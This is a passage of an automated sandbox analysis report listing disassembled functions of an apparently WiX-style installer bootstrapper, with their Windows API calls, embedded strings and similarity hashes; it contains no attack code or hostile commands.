Part of subcall function 007C38D4: GetProcessHeap.KERNEL32(?,000001C7,?,007C2284,000001C7,00000001,80004005,8007139F,?,?,0080015F,8007139F,?,00000000,00000000,8007139F), ref: 007C38E5
Part of subcall function 007C38D4: RtlAllocateHeap.NTDLL(00000000,?,007C2284,000001C7,00000001,80004005,8007139F,?,?,0080015F,8007139F,?,00000000,00000000,8007139F), ref: 007C38EC

Part of subcall function 007C3B51: GetProcessHeap.KERNEL32(00000000,000001C7,?,007C21DC,000001C7,80004005,8007139F,?,?,0080015F,8007139F,?,00000000,00000000,8007139F), ref: 007C3B59
Part of subcall function 007C3B51: HeapSize.KERNEL32(00000000,?,007C21DC,000001C7,80004005,8007139F,?,?,0080015F,8007139F,?,00000000,00000000,8007139F), ref: 007C3B60

_memcpy_s.LIBCMT ref: 007C3B04

Strings

memutil.cpp, xrefs: 007C3B45

Memory Dump Source

Source File: 00000002.00000002.3993068921.00000000007C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 007C0000, based on PE: true

Associated: 00000002.00000002.3992894641.00000000007C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993404087.000000000080B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993642804.000000000082A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993827893.000000000082E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7c0000_UNK_.jbxd

Similarity

API ID: Heap$Process$AllocAllocateSize_memcpy_s
String ID: memutil.cpp
API String ID: 3406509257-2429405624
Opcode ID: 955af9f98b470207a514f3a7f7268b7046efff84e04fee860e145acb052ca33c
Instruction ID: 90d4647ff966b9bdb37467c9ab80477edf16605aa6ff353d0f009f16c7e18822
Opcode Fuzzy Hash: 955af9f98b470207a514f3a7f7268b7046efff84e04fee860e145acb052ca33c
Instruction Fuzzy Hash: 8011D2B1601658EFDB211E249C49E6E3B59DF44764B00C22DF9194B290CB79CE509690

Function 00808803 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 69timeCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 0080884C
SystemTimeToFileTime.KERNEL32(?,00000000), ref: 00808874
GetLastError.KERNEL32 ref: 0080887E

Strings

inetutil.cpp, xrefs: 0080889F

Memory Dump Source

Source File: 00000002.00000002.3993068921.00000000007C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 007C0000, based on PE: true

Associated: 00000002.00000002.3992894641.00000000007C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993404087.000000000080B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993642804.000000000082A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993827893.000000000082E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7c0000_UNK_.jbxd

Similarity

API ID: ErrorLastTime$FileSystem
String ID: inetutil.cpp
API String ID: 1528435940-2900720265
Opcode ID: a1c28acc0b0b5a75d98d267c3d4dab3864c763fe0eae9a5c4deb18116203e450
Instruction ID: 51b5e19de4eb9d645d3b14c80f28a060c218cd88f36b3175dac9fbc8260964f7
Opcode Fuzzy Hash: a1c28acc0b0b5a75d98d267c3d4dab3864c763fe0eae9a5c4deb18116203e450
Instruction Fuzzy Hash: 9D11B272A01629EBE760DBB9CC44BABB7ECFF08340F11412AEE05E7150EA348D4487E1

Function 007D3955 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 69registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00800E3F: RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,00000000,00000001,00000000,?,00805699,80000002,00000000,00020019,00000000,SOFTWARE\Policies\,00000000,00000000,00000000), ref: 00800E52

RegCloseKey.ADVAPI32(00000000,SOFTWARE\Policies\Microsoft\Windows\Installer,00020019,00000001,feclient.dll,?,?,?,007D3E61,feclient.dll,?,00000000,?,?,?,007C4A0C), ref: 007D39F1

Part of subcall function 00800F6E: RegQueryValueExW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000002,00000001,00000000,00000000,00000000,00000000,00000000), ref: 00800FE4
Part of subcall function 00800F6E: RegQueryValueExW.ADVAPI32(?,00000000,00000000,?,00000000,00000000,00000000,?), ref: 0080101F

Strings

feclient.dll, xrefs: 007D395A
Logging, xrefs: 007D3983
SOFTWARE\Policies\Microsoft\Windows\Installer, xrefs: 007D3966

Memory Dump Source

Source File: 00000002.00000002.3993068921.00000000007C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 007C0000, based on PE: true

Associated: 00000002.00000002.3992894641.00000000007C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993404087.000000000080B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993642804.000000000082A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993827893.000000000082E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7c0000_UNK_.jbxd

Similarity

API ID: QueryValue$CloseOpen
String ID: Logging$SOFTWARE\Policies\Microsoft\Windows\Installer$feclient.dll
API String ID: 1586453840-3596319545
Opcode ID: 3774c91e71d1949911d2487169453d390aadcc4ecf7dbfc1d07b411c79287a00
Instruction ID: a1d75871be3b4794ced0d4a2b7d490470a7003c6e4139416f37328c25ad3d2c2
Opcode Fuzzy Hash: 3774c91e71d1949911d2487169453d390aadcc4ecf7dbfc1d07b411c79287a00
Instruction Fuzzy Hash: F311E673B40208BBDB218A94DD57AAEB778FB00758F444067E505A7290D6F5AF80DB12

Function 00800658 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62filestringCOMMONLIBRARYCODE

Download Yara Rule

APIs

lstrlenA.KERNEL32(?,00000000,00000000,00000000,?,?,007FFF0B,?,?,00000000,00000000,0000FDE9), ref: 0080066A
WriteFile.KERNEL32(FFFFFFFF,00000000,00000000,00000000,00000000,?,?,007FFF0B,?,?,00000000,00000000,0000FDE9), ref: 008006A6
GetLastError.KERNEL32(?,?,007FFF0B,?,?,00000000,00000000,0000FDE9), ref: 008006B0

Strings

logutil.cpp, xrefs: 008006E0

Memory Dump Source

Source File: 00000002.00000002.3993068921.00000000007C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 007C0000, based on PE: true

Associated: 00000002.00000002.3992894641.00000000007C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993404087.000000000080B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993642804.000000000082A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993827893.000000000082E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7c0000_UNK_.jbxd

Similarity

API ID: ErrorFileLastWritelstrlen
String ID: logutil.cpp
API String ID: 606256338-3545173039
Opcode ID: eb47e59c29323cb21f58d3ea169e600db474c17e91c0aa5acfa81275acb901f4
Instruction ID: b021f815b76e87c257d0cdfe389c75328d7eaa5f8d6e1f145160627e4c751ffb
Opcode Fuzzy Hash: eb47e59c29323cb21f58d3ea169e600db474c17e91c0aa5acfa81275acb901f4
Instruction Fuzzy Hash: 5E112932A01325ABC7609AB5CC44FAFB7ADFBE5760F004225FD11D7280EB31AD108AE1

Function 007C1209 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 61COMMON

Download Yara Rule

APIs

CommandLineToArgvW.SHELL32(00000000,00000000,00000000,00000000,00000000,00000000,ignored ,00000000,?,00000000,?,?,?,007C5137,00000000,?), ref: 007C1247
GetLastError.KERNEL32(?,?,?,007C5137,00000000,?,?,00000003,00000000,00000000,?,?,?,?,?,?), ref: 007C1251

Strings

apputil.cpp, xrefs: 007C1272
ignored , xrefs: 007C1216

Memory Dump Source

Source File: 00000002.00000002.3993068921.00000000007C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 007C0000, based on PE: true

Associated: 00000002.00000002.3992894641.00000000007C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993404087.000000000080B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993642804.000000000082A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993827893.000000000082E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7c0000_UNK_.jbxd

Similarity

API ID: ArgvCommandErrorLastLine
String ID: apputil.cpp$ignored
API String ID: 3459693003-568828354
Opcode ID: cb1700b136c2360e7eeed84d759db8a7eb5f0dc805c6693805c859381aae2ff1
Instruction ID: 4d8cb1f6eee90f16b9f92462446967bc6c0d0527c81e4de5572d7f65dc6f891c
Opcode Fuzzy Hash: cb1700b136c2360e7eeed84d759db8a7eb5f0dc805c6693805c859381aae2ff1
Instruction Fuzzy Hash: 2B116D76A00228EBDB21DB99CC05EAFBBA8FF45750B1141ADFC04E7251E734DE009BA0

Function 007ECF56 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 58synchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000000FF,00000002,00000000,?,?,007ED1DC,00000000,00000000,00000000,?), ref: 007ECF66
ReleaseMutex.KERNEL32(?,?,007ED1DC,00000000,00000000,00000000,?), ref: 007ECFED

Part of subcall function 007C38D4: GetProcessHeap.KERNEL32(?,000001C7,?,007C2284,000001C7,00000001,80004005,8007139F,?,?,0080015F,8007139F,?,00000000,00000000,8007139F), ref: 007C38E5
Part of subcall function 007C38D4: RtlAllocateHeap.NTDLL(00000000,?,007C2284,000001C7,00000001,80004005,8007139F,?,?,0080015F,8007139F,?,00000000,00000000,8007139F), ref: 007C38EC

Strings

Failed to allocate memory for message data, xrefs: 007ECFB5
NetFxChainer.cpp, xrefs: 007ECFAB

Memory Dump Source

Source File: 00000002.00000002.3993068921.00000000007C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 007C0000, based on PE: true

Associated: 00000002.00000002.3992894641.00000000007C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993404087.000000000080B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993642804.000000000082A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993827893.000000000082E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7c0000_UNK_.jbxd

Similarity

API ID: Heap$AllocateMutexObjectProcessReleaseSingleWait
String ID: Failed to allocate memory for message data$NetFxChainer.cpp
API String ID: 2993511968-1624333943
Opcode ID: 551b44cb21ade567206e1361ac23da598a2d76b571749eeae3bb817b94176a54
Instruction ID: 62df7be2329dbda243dbaf647eadbb2c5803683059d161a3219dd6291dd37b4f
Opcode Fuzzy Hash: 551b44cb21ade567206e1361ac23da598a2d76b571749eeae3bb817b94176a54
Instruction Fuzzy Hash: 9B11C1B1301215EFCB05DF28D894E5ABBB5FF09320F104169F9148B791C735AC21CBA4

Function 007C1F78 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 53windowCOMMON

Download Yara Rule

APIs

FormatMessageW.KERNEL32(000011FF,007C5386,?,00000000,00000000,00000000,?,80070656,?,?,?,007DE50B,00000000,007C5386,00000000,80070656), ref: 007C1FAA
GetLastError.KERNEL32(?,?,?,007DE50B,00000000,007C5386,00000000,80070656,?,?,007D3F6B,007C5386,?,80070656,00000001,crypt32.dll), ref: 007C1FB7
LocalFree.KERNEL32(00000000,?,00000000,00000000,?,?,?,007DE50B,00000000,007C5386,00000000,80070656,?,?,007D3F6B,007C5386), ref: 007C1FFE

Strings

strutil.cpp, xrefs: 007C1FDB

Memory Dump Source

Source File: 00000002.00000002.3993068921.00000000007C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 007C0000, based on PE: true

Associated: 00000002.00000002.3992894641.00000000007C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993404087.000000000080B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993642804.000000000082A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993827893.000000000082E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7c0000_UNK_.jbxd

Similarity

API ID: ErrorFormatFreeLastLocalMessage
String ID: strutil.cpp
API String ID: 1365068426-3612885251
Opcode ID: 330d486424032c0844a4af029c6a0634ed28be39526deaac60e00576a46fd8d2
Instruction ID: b81a23da5725537746198d8882fe1b98efec600f98e5c6b97e14948eaf6079a6
Opcode Fuzzy Hash: 330d486424032c0844a4af029c6a0634ed28be39526deaac60e00576a46fd8d2
Instruction Fuzzy Hash: 25113C76901229FBEB159F94CC09AEA7BA8EB09340F00416EBD11A2150E7754E10D7E0

Function 007DFC51 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 50COMMON

Download Yara Rule

APIs

new.LIBCMT ref: 007DFC58

Strings

Failed to QI for IBootstrapperuser from BootstrapperuserForApplication object., xrefs: 007DFCB0
Failed to allocate new BootstrapperuserForApplication object., xrefs: 007DFC8E
userForApplication.cpp, xrefs: 007DFC84

Memory Dump Source

Source File: 00000002.00000002.3993068921.00000000007C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 007C0000, based on PE: true

Associated: 00000002.00000002.3992894641.00000000007C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993404087.000000000080B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993642804.000000000082A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993827893.000000000082E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7c0000_UNK_.jbxd

Similarity

API ID:
String ID: userForApplication.cpp$Failed to QI for IBootstrapperuser from BootstrapperuserForApplication object.$Failed to allocate new BootstrapperuserForApplication object.
API String ID: 0-1509993410
Opcode ID: 1a1f30184a28d20045122f44e4dffdcfb8026fcca0ca59d4d529d46c68d94608
Instruction ID: c5134128fdd2550567a404ed366bec65ca8ba71c2bbde867a12bc4941ffe521f
Opcode Fuzzy Hash: 1a1f30184a28d20045122f44e4dffdcfb8026fcca0ca59d4d529d46c68d94608
Instruction Fuzzy Hash: 9DF04932244716BB87022754EC05EDE3769EF45B70B10003BFC0AEA390FF2C89619572

Function 00804C67 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 49fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(0080B4F0,40000000,00000001,00000000,00000002,00000080,00000000,007D0328,00000000,?,007CF37F,?,00000080,0080B4F0,00000000), ref: 00804C7F
GetLastError.KERNEL32(?,007CF37F,?,00000080,0080B4F0,00000000,?,007D0328,?,00000094,?,?,?,?,?,00000000), ref: 00804C8C
CloseHandle.KERNEL32(00000000,00000000,?,007CF37F,?,007CF37F,?,00000080,0080B4F0,00000000,?,007D0328,?,00000094), ref: 00804CE0

Strings

fileutil.cpp, xrefs: 00804CB0

Memory Dump Source

Source File: 00000002.00000002.3993068921.00000000007C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 007C0000, based on PE: true

Associated: 00000002.00000002.3992894641.00000000007C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993404087.000000000080B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993642804.000000000082A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993827893.000000000082E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7c0000_UNK_.jbxd

Similarity

API ID: CloseCreateErrorFileHandleLast
String ID: fileutil.cpp
API String ID: 2528220319-2967768451
Opcode ID: 5843bd341194e08911ac96dec069e58eb9d207b8c11b09f531766ce1eaaff6ae
Instruction ID: f40fadd5f8d8d0cdab1e164202d7f968720aa0bd99c40781c98cfe49ba6e31b7
Opcode Fuzzy Hash: 5843bd341194e08911ac96dec069e58eb9d207b8c11b09f531766ce1eaaff6ae
Instruction Fuzzy Hash: F2018FB2782624ABEB715E699C05F5B3A95FB41BB0F014215FF24EB1E0D7318C1196A0

Function 00804840 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 48fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,00000080,00000001,00000000,00000003,00000080,00000000,000002C0,00000000,?,007E8A30,00000000,00000088,000002C0,BundleCachePath,00000000), ref: 00804874
GetLastError.KERNEL32(?,007E8A30,00000000,00000088,000002C0,BundleCachePath,00000000,000002C0,BundleVersion,000000B8,000002C0,userVersion,000002C0,000000B0), ref: 00804881

Strings

fileutil.cpp, xrefs: 00804855, 008048A5

Memory Dump Source

Source File: 00000002.00000002.3993068921.00000000007C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 007C0000, based on PE: true

Associated: 00000002.00000002.3992894641.00000000007C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993404087.000000000080B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993642804.000000000082A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993827893.000000000082E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7c0000_UNK_.jbxd

Similarity

API ID: CreateErrorFileLast
String ID: fileutil.cpp
API String ID: 1214770103-2967768451
Opcode ID: 2e28bb00145f09ddce47a56506c63655346b48f623fcf495f9467718836b0ea2
Instruction ID: 84e92791788ce4d2fc28e710050387d7c6cdc5dc6516f6138d26d1aefc997199
Opcode Fuzzy Hash: 2e28bb00145f09ddce47a56506c63655346b48f623fcf495f9467718836b0ea2
Instruction Fuzzy Hash: 3601F472780620BBF7A026A8AC09F7B2688FB40B60F01C235FF15EB1D0D6794D4052E0

Function 007E69A8 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 48serviceCOMMON

Download Yara Rule

APIs

ControlService.ADVAPI32(007E68BA,00000001,?,00000001,00000000,?,?,?,?,?,?,007E68BA,00000000), ref: 007E69D0
GetLastError.KERNEL32(?,?,?,?,?,?,007E68BA,00000000), ref: 007E69DA

Strings

msuuser.cpp, xrefs: 007E69FE
Failed to stop wusa service., xrefs: 007E6A08

Memory Dump Source

Source File: 00000002.00000002.3993068921.00000000007C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 007C0000, based on PE: true

Associated: 00000002.00000002.3992894641.00000000007C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993404087.000000000080B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993642804.000000000082A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993827893.000000000082E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7c0000_UNK_.jbxd

Similarity

API ID: ControlErrorLastService
String ID: Failed to stop wusa service.$msuuser.cpp
API String ID: 4114567744-2259829683
Opcode ID: d248db54a206b83fb0ffeb788a7b6c8a6bf31ffcf0ccac21c591239052662169
Instruction ID: 64b477560667aa6341eb8351cf16ff2fe6c9ab80b77ff3bb263b8427d7b099b5
Opcode Fuzzy Hash: d248db54a206b83fb0ffeb788a7b6c8a6bf31ffcf0ccac21c591239052662169
Instruction Fuzzy Hash: AD01DB72B40724ABE720ABB99C45BEB77E8FF48750F014139FD04FB180EA289D4586D5

Function 007DEA72 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 38threadwindowCOMMON

Download Yara Rule

APIs

PostThreadMessageW.USER32(?,00009002,00000000,?), ref: 007DEA9A
GetLastError.KERNEL32 ref: 007DEAA4

Strings

Failed to post elevate message., xrefs: 007DEAD2
userForApplication.cpp, xrefs: 007DEAC8

Memory Dump Source

Source File: 00000002.00000002.3993068921.00000000007C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 007C0000, based on PE: true

Associated: 00000002.00000002.3992894641.00000000007C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993404087.000000000080B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993642804.000000000082A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993827893.000000000082E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7c0000_UNK_.jbxd

Similarity

API ID: ErrorLastMessagePostThread
String ID: userForApplication.cpp$Failed to post elevate message.
API String ID: 2609174426-4098423239
Opcode ID: 4ef7def9ced0c3b2f4270cd55435dac3a483558026015d14d496f9b9e16a0b80
Instruction ID: 068265ec56fc786c345247b5670f0f485a11ce896ab192f8ceab0499aee728cd
Opcode Fuzzy Hash: 4ef7def9ced0c3b2f4270cd55435dac3a483558026015d14d496f9b9e16a0b80
Instruction Fuzzy Hash: 39F0F632700331ABD3206A589C09EA777D8FF04760F11822AFE28EB2D1E7298C0186D5

Function 007CD7CF Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 36libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(?,BootstrapperApplicationDestroy), ref: 007CD7F6
FreeLibrary.KERNEL32(?,?,007C47D1,00000000,?,?,007C5386,?,?), ref: 007CD805
GetLastError.KERNEL32(?,007C47D1,00000000,?,?,007C5386,?,?), ref: 007CD80F

Strings

BootstrapperApplicationDestroy, xrefs: 007CD7EE

Memory Dump Source

Source File: 00000002.00000002.3993068921.00000000007C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 007C0000, based on PE: true

Associated: 00000002.00000002.3992894641.00000000007C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993404087.000000000080B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993642804.000000000082A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993827893.000000000082E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7c0000_UNK_.jbxd

Similarity

API ID: AddressErrorFreeLastLibraryProc
String ID: BootstrapperApplicationDestroy
API String ID: 1144718084-3186005537
Opcode ID: e1c75b1a4166e94b987c61cef9449387219020d7a7bd4d2e47cc716fb8f9b452
Instruction ID: 0e89c96286fbc2170390b38e8972dc767f3e770fd0c297a3dbdaa9a425e49de9
Opcode Fuzzy Hash: e1c75b1a4166e94b987c61cef9449387219020d7a7bd4d2e47cc716fb8f9b452
Instruction Fuzzy Hash: A0F0E7362007019FD7205F66DC08B67B7E9FF84762B01C53EE566C6560DB79E810CB60

Function 00803C58 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 36comCOMMON

Download Yara Rule

APIs

CLSIDFromProgID.OLE32(Microsoft.Update.AutoUpdate,^S|,?,00000000,007C535E,?,?,?), ref: 00803C7F
CoCreateInstance.OLE32(00000000,00000000,00000001,00826F3C,?), ref: 00803C97

Strings

Microsoft.Update.AutoUpdate, xrefs: 00803C7A
^S|, xrefs: 00803C6F, 00803C76, 00803C79

Memory Dump Source

Source File: 00000002.00000002.3993068921.00000000007C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 007C0000, based on PE: true

Associated: 00000002.00000002.3992894641.00000000007C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993404087.000000000080B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993642804.000000000082A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993827893.000000000082E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7c0000_UNK_.jbxd

Similarity

API ID: CreateFromInstanceProg
String ID: Microsoft.Update.AutoUpdate$^S|
API String ID: 2151042543-166624349
Opcode ID: a04246a2409618234ea0a46592e74f6484a366fe4b0b01094ef3a06f5787c137
Instruction ID: f7daf0fe5b3610c89d8342c01c1bf764304a502542457ed4eb05318aa8d94d9d
Opcode Fuzzy Hash: a04246a2409618234ea0a46592e74f6484a366fe4b0b01094ef3a06f5787c137
Instruction Fuzzy Hash: 56F03071601218FBDB10DBA8DD49DABB7A8EB08710F510065EA01E7250D670AE5486A2

Function 007DF086 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 33threadwindowCOMMON

Download Yara Rule

APIs

PostThreadMessageW.USER32(?,00009001,00000000,?), ref: 007DF09B
GetLastError.KERNEL32 ref: 007DF0A5

Strings

Failed to post plan message., xrefs: 007DF0D3
userForApplication.cpp, xrefs: 007DF0C9

Memory Dump Source

Source File: 00000002.00000002.3993068921.00000000007C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 007C0000, based on PE: true

Associated: 00000002.00000002.3992894641.00000000007C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993404087.000000000080B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993642804.000000000082A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993827893.000000000082E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7c0000_UNK_.jbxd

Similarity

API ID: ErrorLastMessagePostThread
String ID: userForApplication.cpp$Failed to post plan message.
API String ID: 2609174426-2952114608
Opcode ID: ebc53e16b5bc0bf75f16a91aae36cce7344c7653b07b3d0183beb7577b2c6c0b
Instruction ID: 9a3e285476e066b1d414bd235e2d5c034a4f08237c70042889b3d47c760294be
Opcode Fuzzy Hash: ebc53e16b5bc0bf75f16a91aae36cce7344c7653b07b3d0183beb7577b2c6c0b
Instruction Fuzzy Hash: 18F06C327453347BE76166699C49F877BD8FF04BA0F018025FD1DE7191D6298C5085E5

Function 007DF194 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 33threadwindowCOMMON

Download Yara Rule

APIs

PostThreadMessageW.USER32(?,00009005,?,00000000), ref: 007DF1A9
GetLastError.KERNEL32 ref: 007DF1B3

Strings

Failed to post shutdown message., xrefs: 007DF1E1
userForApplication.cpp, xrefs: 007DF1D7

Memory Dump Source

Source File: 00000002.00000002.3993068921.00000000007C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 007C0000, based on PE: true

Associated: 00000002.00000002.3992894641.00000000007C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993404087.000000000080B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993642804.000000000082A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993827893.000000000082E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7c0000_UNK_.jbxd

Similarity

API ID: ErrorLastMessagePostThread
String ID: userForApplication.cpp$Failed to post shutdown message.
API String ID: 2609174426-188808143
Opcode ID: 3e6ee4b0afe4f52be27809807defb404cedf1ac30c15ed162d7112694073a860
Instruction ID: d049585d1604e7da77f66634bce00e39df9ec5c48546ed864fc75a01a9f30ff8
Opcode Fuzzy Hash: 3e6ee4b0afe4f52be27809807defb404cedf1ac30c15ed162d7112694073a860
Instruction Fuzzy Hash: 57F06C337413347BE7606AA9AC09F877BD8FF04B60F024025FD19E7591E6558D5086E5

Function 007E051A Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 33COMMON

Download Yara Rule

APIs

SetEvent.KERNEL32(0080B468,00000000,?,007E145A,?,00000000,?,007CC121,?,007C52FD,?,007D73B2,?,?,007C52FD,?), ref: 007E0524
GetLastError.KERNEL32(?,007E145A,?,00000000,?,007CC121,?,007C52FD,?,007D73B2,?,?,007C52FD,?,007C533D,00000001), ref: 007E052E

Strings

cabextract.cpp, xrefs: 007E0552
Failed to set begin operation event., xrefs: 007E055C

Memory Dump Source

Source File: 00000002.00000002.3993068921.00000000007C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 007C0000, based on PE: true

Associated: 00000002.00000002.3992894641.00000000007C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993404087.000000000080B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993642804.000000000082A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993827893.000000000082E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7c0000_UNK_.jbxd

Similarity

API ID: ErrorEventLast
String ID: Failed to set begin operation event.$cabextract.cpp
API String ID: 3848097054-4159625223
Opcode ID: b208d88d31e09897e3249c018a19508753b293c5274ee1c926ec26da6018b015
Instruction ID: 50fc724dabfb46fb3d4cab21da3604ae9f014ef3b55adc8610c827012d768df1
Opcode Fuzzy Hash: b208d88d31e09897e3249c018a19508753b293c5274ee1c926ec26da6018b015
Instruction Fuzzy Hash: C3F0A773A02730AAE71166AAAC05FD776D8EF08760B010135FD05E7150E6589D5146E5

Function 007DE978 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 33threadwindowCOMMON

Download Yara Rule

APIs

PostThreadMessageW.USER32(?,00009003,00000000,?), ref: 007DE98D
